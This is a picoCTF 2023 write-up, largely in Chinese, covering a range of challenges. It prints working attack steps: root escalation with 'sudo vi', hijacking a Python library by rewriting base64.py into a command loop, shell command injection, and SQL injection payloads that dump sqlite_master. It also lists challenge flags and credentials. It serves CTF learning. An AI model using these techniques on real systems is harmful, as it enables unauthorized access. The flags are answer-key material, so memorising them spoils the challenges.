# picoCTF 2023 Writeup ## Binary Exploitation ### hijacking AUTHOR: THEONESTE BYAGUTANGAZA Description Getting root access can allow you to read the flag. Luckily there is a python file that you might like to play with. Through Social engineering, we've got the credentials to use on the server. SSH is running on the server. #### 隨便逛逛  發現/challenge資料夾很可疑，但是沒辦法cd進去  查看sudo 發現使用者可以用sudo權限使用vi  #### exploit ```shell= sudo vi :shell ```  privilege escalation了，再來就直接A進去/challenge/把flag撈出來就好  >picoCTF{pYth0nn_libraryH!j@CK!n9_5a7b5866} #### 原本解法 這題當初在解的時候是在.server.py裡面import 的base64裡面搞鬼 只是不知道為甚麼在寫writeup的時候沒辦法用root權限執行.server.py 先`ls -al`發現有一個`.server.py` `cat .server.py` ```python= import base64 import os import socket ip = 'picoctf.org' response = os.system("ping -c 1 " + ip) #saving ping details to a variable host_info = socket.gethostbyaddr(ip) #getting IP from a domaine host_info_to_str = str(host_info[2]) host_info = base64.b64encode(host_info_to_str.encode('ascii')) print("Hello, this is a part of information gathering",'Host: ', host_info) ``` `vim .server.py`沒辦法動`.server.py`，因為他是readonly，但是權限沒有設定到`base64.py` **在import file裡面加料** `vim /usr/lib/python3.8/base64.py` ```python= import os while 1: cmd=input() print(os.popen(cmd).read()) ``` **get shell** ```shell= sudo python3 .server.py ``` ## Forensics ### hideme AUTHOR: GEOFFREY NJOGU Description Every file gets a flag. The SOC analyst saw one image been sent back and forth between two people. They decided to investigate and found out that there was more than what meets the eye here. 下載下來發現是一張圖片 看一看感覺很正常 用`exiftool`看了一下沒有把flag藏在某個欄位裡 `strings flag.png`看看  發現裡面有長得很像路徑的東東 直接把`flag.png`當成zip解壓縮看看 ```shell= unzip flag.png ``` 得到半張flag  >picoCTF{Hiddinng_An_imag3_within_@n_ima9e_92076717} ### FindAndOpen AUTHOR: MUBARAK MIKAIL Description Someone might have hidden the password in the trace file. Find the key to unlock this file. This tracefile might be good to analyze. 這題給了兩個檔案，第一個是`flag.zip`和`dump.pcap`。 嘗試解壓縮`flag.zip`，發現需要密碼 #### 先從`dump.pcap`下手看看 用wireshark打開`dump.pcap`  隨便看幾個封包後發現都有明文  找到一個超可疑的封包，`=`結尾很可能是base64編碼的填充字元 decode後得到半截flag >This is the secret: picoCTF{R34DING_LOKd_ 回到`flag.zip`，直接通靈把第一段flag當密碼 >picoCTF{R34DING_LOKd_fil56_succ3ss_5ed3a878} ?? ## General Skills ### money-ware AUTHOR: JUNI19 Description Flag format: picoCTF{Malwarename} The first letter of the malware name should be capitalized and the rest lowercase. Your friend just got hacked and has been asked to pay some bitcoins to 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX. He doesn’t seem to understand what is going on and asks you for advice. Can you identify what malware he’s being a victim of? Google `1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX` 找到[CNBC的新聞](https://www.cnbc.com/2017/06/28/ransomware-cyberattack-petya-bitcoin-payment.html)  >picoCTF{Petya} 水爛 ### repetitions AUTHOR: THEONESTE BYAGUTANGAZA Description Can you make sense of this file? Download the file here. 下載`enc_flag` ```= VmpGU1EyRXlUWGxTYmxKVVYwZFNWbGxyV21GV1JteDBUbFpPYWxKdFVsaFpWVlUxWVZaS1ZWWnVh RmRXZWtab1dWWmtSMk5yTlZWWApiVVpUVm10d1VWZFdVa2RpYlZaWFZtNVdVZ3BpU0VKeldWUkNk MlZXVlhoWGJYQk9VbFJXU0ZkcVRuTldaM0JZVWpGS2VWWkdaSGRXCk1sWnpWV3hhVm1KRk5XOVVW VkpEVGxaYVdFMVhSbFZhTTBKWVZGWmFXbVZzV2tkWk0yaFRDbUpXV25sVVZtaFRWMGRHZEdWRlZs aGkKYlRrelZERldUMkpzUWxWTlJYTkxDZz09Cg== ``` ==經典base64 decode後 ```= VjFSQ2EyTXlSblJUV0dSVllrWmFWRmx0TlZOalJtUlhZVVU1YVZKVVZuaFdWekZoWVZkR2NrNVVX bUZTVmtwUVdWUkdibVZXVm5WUgpiSEJzWVRCd2VWVXhXbXBOUlRWSFdqTnNWZ3BYUjFKeVZGZHdW MlZzVWxaVmJFNW9UVVJDTlZaWE1XRlVaM0JYVFZaWmVsWkdZM2hTCmJWWnlUVmhTV0dGdGVFVlhi bTkzVDFWT2JsQlVNRXNLCg== ``` 再decode ```= V1RCa2MyRnRTWGRVYkZaVFltNVNjRmRXYUU5aVJUVnhWVzFhYVdGck5UWmFSVkpQWVRGbmVWVnVR bHBsYTBweVUxWmpNRTVHWjNsVgpXR1JyVFdwV2VsUlZVbE5oTURCNVZXMWFUZ3BXTVZZelZGY3hS bVZyTVhSWGFteEVXbm93T1VOblBUMEsK ``` de ```= WTBkc2FtSXdUbFZTYm5ScFdWaE9iRTVxVW1aaWFrNTZaRVJPYTFneVVuQlpla0pyU1ZjME5GZ3lV WGRrTWpWelRVUlNhMDB5VW1aTgpWMVYzVFcxRmVrMXRXamxEWnowOUNnPT0K ``` deeee ```= Y0dsamIwTlVSbnRpWVhObE5qUmZiak56ZEROa1gyUnBZekJrSVc0NFgyUXdkMjVzTURSa00yUmZN V1V3TW1Fek1tWjlDZz09Cg== ``` eeeeeeee ```= cGljb0NURntiYXNlNjRfbjNzdDNkX2RpYzBkIW44X2Qwd25sMDRkM2RfMWUwMmEzMmZ9Cg== ``` aaaaaaaaaa ```= picoCTF{base64_n3st3d_dic0d!n8_d0wnl04d3d_1e02a32f} ```  >picoCTF{base64_n3st3d_dic0d!n8_d0wnl04d3d_1e02a32f} ### Permissions AUTHOR: GEOFFREY NJOGU Description Can you read files in the root file? The system admin has provisioned an account for you on the main server: ssh -p 53849 picoplayer@saturn.picoctf.net Password: x+T6aPgE4- Can you login and read the root file?  >picoCTF{uS1ng_v1m_3dit0r_f6ad392b} 水爛 ### chrono AUTHOR: MUBARAK MIKAIL Description How to automate tasks to run at intervals on linux servers? Use ssh to connect to this server: Server: saturn.picoctf.net Port: 50602 Username: picoplayer Password: tPmsUpiHeZ  >picoCTF{Sch3DUL7NG_T45K3_L1NUX_0bb95b71} ? ### useless AUTHOR: LOIC SHEMA Description There's an interesting script in the user's home directory Additional details will be available after launching your challenge instance.  >picoCTF{us3l3ss_ch4ll3ng3_3xpl0it3d_6173} ### Special AUTHOR: LT 'SYREAL' JONES Description Don't power users get tired of making spelling mistakes in the shell? Not anymore! Enter Special, the Spell Checked Interface for Affecting Linux. Now, every word is properly spelled and capitalized... automatically and behind-the-scenes! Be the first to test Special in beta, and feel free to tell us all about how Special streamlines every development process that you face. When your co-workers see your amazing shell interface, just tell them: That's Special (TM) Start your instance to see connection details. Additional details will be available after launching your challenge instance. 這題會一直把輸入的指令變成很簡單的單字，然後把開頭用成大寫 `ls`會變`Is` `cat`會變`Cat`，但如果不是第一個字母就不會變大寫，所以可以用cat指令 用`;` 搭配Regex Command Injection ```shell= cat;cat * ```  發現目錄下面有一個資料夾`blargh` ```shell= cat;cat blargh/* ```  >picoCTF{5p311ch3ck_15_7h3_w0r57_f578af59} ## Reverse Engineering ### Reverse AUTHOR: MUBARAK MIKAIL Description Try reversing this file? Can ya? I forgot the password to this file. Please find it for me? 題目給了一個檔案`ret`，執行後要輸密碼  丟GDB ```shell= start c ctrl^C ni到死 ```  在呼叫strcmp比對密碼時把`rsi` dump出來，得到前半截flag >picoCTF{3lf_r3v3r5ing_succe55ful_9ae8528 重新執行`ret`，輸入密碼  >picoCTF{3lf_r3v3r5ing_succe55ful_9ae85289} ## Web Exploitation ### More SQLi AUTHOR: MUBARAK MIKAIL Description Can you find the flag on this website. Additional details will be available after launching your challenge instance. #### Bypass login 進入網頁，經典登入介面  ```sql= username=admin& password=' or 'a'='a ```  題目很貼心把`query`都print出來給你 調整一下 ```sql= username=123& password=' or 1=1;-- ``` 進入之後有一個搜尋頁面  #### 測試有幾個欄位 ```sql= searchInput=' union select 1,2,3;-- ```  #### dump Table ```sql= searchInput=' or 'a'='a ```  沒看到`flag`，可能在別的`table` ```sql= ' union select group_concat(sql),2,3 from sqlite_master WHERE type='table';-- ```  現在知道`flag`應該在`more_table`的`flag_TEXT`欄位 ```sql= ' union select flag,2,3 from more_table;-- ```  >picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_3b0fca37} ### MatchTheRegex AUTHOR: SUNDAY JACOB NWANYIM Description How about trying to match a regular expression Additional details will be available after launching your challenge instance. 一開始沒看hint不知道到底要幹嘛  結果是要match`^p.....F!?`   >picoCTF{succ3ssfully_matchtheregex_9080e406} 世紀水題 ### findme AUTHOR: GEOFFREY NJOGU Description Help us test the form by submiting the username as test and password as test! Additional details will be available after launching your challenge instance. 先用`test` `test!`登入  進去後他說*I was redirected here by a friend of mine but i couldnt find anything. Help me search for flags :-)*  #### 用`BurpSuite`查看被redirected的頁面  id看起來很像經典base64   >picoCTF{proxies_all_the_way_be716d8e}